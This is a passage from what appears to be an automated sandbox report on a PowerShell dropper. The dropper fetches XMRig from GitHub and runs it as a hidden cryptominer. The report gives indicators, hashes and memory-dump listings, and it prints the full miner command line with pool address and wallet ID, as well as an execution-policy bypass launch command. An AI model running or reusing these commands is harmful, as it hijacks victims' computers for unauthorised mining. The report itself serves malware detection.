Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/2428-3-0x00007FF80AF13000-0x00007FF80AF14000-memory.dmp

memory/2428-5-0x000001E5DE9F0000-0x000001E5DEA12000-memory.dmp

memory/2428-8-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

memory/2428-9-0x000001E5DEAA0000-0x000001E5DEB16000-memory.dmp

memory/2428-10-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4exrp5zk.san.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2428-25-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

memory/2428-48-0x000001E5DEC40000-0x000001E5DEC52000-memory.dmp

memory/2428-61-0x000001E5DEC20000-0x000001E5DEC2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5028-90-0x000002C0DF270000-0x000002C0DF290000-memory.dmp

memory/2428-92-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

memory/5028-91-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/2428-94-0x00007FF80AF13000-0x00007FF80AF14000-memory.dmp

memory/5028-93-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/2428-95-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

memory/5028-96-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-97-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-98-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-99-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-100-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-101-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-102-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-103-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-104-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-105-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-106-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-107-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-108-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-109-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-110-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-111-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-112-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-113-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-114-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-115-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-116-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-117-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-118-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-119-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-120-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-121-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-122-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-123-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-124-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-125-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-126-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-127-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-128-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-129-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-130-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-131-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-132-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-133-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-134-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-135-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-136-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-137-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-138-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-139-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-140-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-141-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-142-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-143-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-144-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-145-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-146-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-147-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-148-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-149-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-150-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-151-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-152-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-153-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-154-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-155-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

memory/5028-156-0x00007FF607DD0000-0x00007FF608A03000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1753s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp

memory/5008-5-0x00000157AA9E0000-0x00000157AAA02000-memory.dmp

memory/5008-7-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ciktlqf.kzk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5008-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-9-0x00000157AACC0000-0x00000157AAD36000-memory.dmp

memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-48-0x00000157AACA0000-0x00000157AACB2000-memory.dmp

memory/5008-61-0x00000157AAC80000-0x00000157AAC8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4660-90-0x0000020337D90000-0x0000020337DB0000-memory.dmp

memory/4660-91-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/5008-92-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-94-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp

memory/4660-93-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/5008-95-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/4660-96-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-97-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-98-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-99-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-100-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-101-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-102-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-103-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-104-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-105-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-106-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-107-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-108-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-109-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-110-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-111-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-112-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-113-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-114-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-115-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-116-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-117-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-118-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-119-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-120-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-121-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-122-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-123-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-124-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-125-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-126-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-127-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-128-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-129-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-130-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-131-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-132-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-133-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-134-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-135-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-136-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-137-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-138-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-139-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-140-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-141-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-142-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-143-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-144-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-145-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-146-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-147-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-148-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-149-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-150-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-151-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-152-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-153-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-154-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-155-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

memory/4660-156-0x00007FF79F330000-0x00007FF79FF63000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:01

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1008-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecxg3xlp.fba.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1008-9-0x00000234BFA50000-0x00000234BFA72000-memory.dmp

memory/1008-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1008-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1008-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1008-14-0x00000234D8560000-0x00000234D8572000-memory.dmp

memory/1008-15-0x00000234D80F0000-0x00000234D80FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3632-46-0x0000017098850000-0x0000017098870000-memory.dmp

memory/3632-47-0x000001712AE10000-0x000001712AE30000-memory.dmp

memory/3632-48-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-49-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-52-0x000001712B480000-0x000001712B4A0000-memory.dmp

memory/3632-51-0x000001712B250000-0x000001712B270000-memory.dmp

memory/1008-50-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1008-53-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/1008-54-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/3632-55-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-56-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-57-0x000001712B250000-0x000001712B270000-memory.dmp

memory/3632-58-0x000001712B480000-0x000001712B4A0000-memory.dmp

memory/3632-59-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-60-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-61-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-62-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-63-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-64-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-65-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-66-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-67-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-68-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-69-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-70-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-71-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-72-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-73-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-74-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-75-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-76-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-77-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-78-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-79-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-80-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-81-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-82-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-83-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-84-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-85-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-86-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-87-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-88-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-89-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-90-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-91-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-92-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-93-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-94-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-95-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-96-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-97-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-98-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-99-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-100-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-101-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-102-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

